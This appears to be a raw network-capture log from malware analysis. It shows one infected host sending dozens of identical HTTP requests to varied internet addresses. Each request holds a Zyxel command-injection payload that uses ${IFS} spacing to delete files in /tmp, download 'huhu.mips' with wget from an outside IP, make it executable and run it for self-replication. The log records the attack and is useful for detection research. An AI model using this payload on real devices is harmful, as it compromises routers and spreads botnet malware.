                                                Jan 29, 2024 07:07:56.512779951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6570192.168.2.2348128159.40.216.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512825966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6571192.168.2.233968845.180.203.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512876034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6572192.168.2.2342448129.108.196.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512902021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6573192.168.2.234780249.93.117.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512940884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6574192.168.2.234876850.236.156.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513000011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6575192.168.2.236096848.141.183.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513029099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6576192.168.2.23529025.143.169.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513051033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6577192.168.2.2332962209.3.182.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513086081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6578192.168.2.2342146178.243.79.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513134956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6579192.168.2.2346790149.165.87.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513187885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6580192.168.2.234239670.39.153.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513206959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6581192.168.2.2335056141.101.242.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513267040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6582192.168.2.2349054175.54.214.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513298035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6583192.168.2.2354908120.35.201.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513318062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6584192.168.2.233763832.105.194.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513379097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6585192.168.2.2333458148.165.171.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513396025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6586192.168.2.235832860.9.53.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513421059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6587192.168.2.2357662153.254.102.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.513468027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6588192.168.2.2360156144.5.12.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520263910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6589192.168.2.2337422102.196.220.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520328999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6590192.168.2.235050448.25.208.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520379066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6591192.168.2.2333038128.16.75.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520425081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6592192.168.2.2353826167.206.3.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520452023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6593192.168.2.2354788175.70.221.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520509958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6594192.168.2.234974681.138.87.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520533085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6595192.168.2.2344752150.203.243.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520555019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6596192.168.2.2360072186.66.57.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520591021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6597192.168.2.235204479.197.199.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520637035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6598192.168.2.234405861.33.167.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520669937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6599192.168.2.2333844116.30.205.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520730972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6600192.168.2.236047224.171.217.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520761013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6601192.168.2.2346032144.18.196.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520797014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6602192.168.2.235078085.85.241.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520828009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6603192.168.2.2359366156.90.107.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520880938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6604192.168.2.2342324178.224.52.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520937920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6605192.168.2.233734098.50.206.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520981073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6606192.168.2.233686680.111.51.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.520982027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6607192.168.2.2354400103.50.94.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521032095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6608192.168.2.2344190120.70.173.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521079063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6609192.168.2.233535823.35.71.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521132946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6610192.168.2.233285085.144.25.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521155119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6611192.168.2.2345260109.22.160.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521209002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6612192.168.2.235273881.216.219.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521240950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6613192.168.2.235726666.151.192.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521276951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6614192.168.2.2343222123.225.194.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521311998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6615192.168.2.234518880.46.88.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521399975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6616192.168.2.2356432180.18.112.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521409988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6617192.168.2.2338934185.166.191.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521472931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6618192.168.2.2350422177.242.122.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521500111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6619192.168.2.2353362205.80.177.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521543980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6620192.168.2.2350412191.213.250.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521570921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6621192.168.2.235973090.170.110.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521620035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6622192.168.2.2334724222.22.194.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521660089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6623192.168.2.234379054.96.108.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521693945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6624192.168.2.2334210162.81.2.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521744013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6625192.168.2.2349098210.250.33.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521795034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6626192.168.2.2356704154.228.13.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521810055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6627192.168.2.233849431.185.84.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521846056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6628192.168.2.2359304112.255.121.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521907091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6629192.168.2.2344810183.111.141.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521939039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6630192.168.2.2341586119.38.208.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.521986961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6631192.168.2.23461708.99.183.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522006035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6632192.168.2.2336240140.81.85.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522056103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6633192.168.2.233917662.155.156.88443
                                                TimestampBytes transferredDirectionData
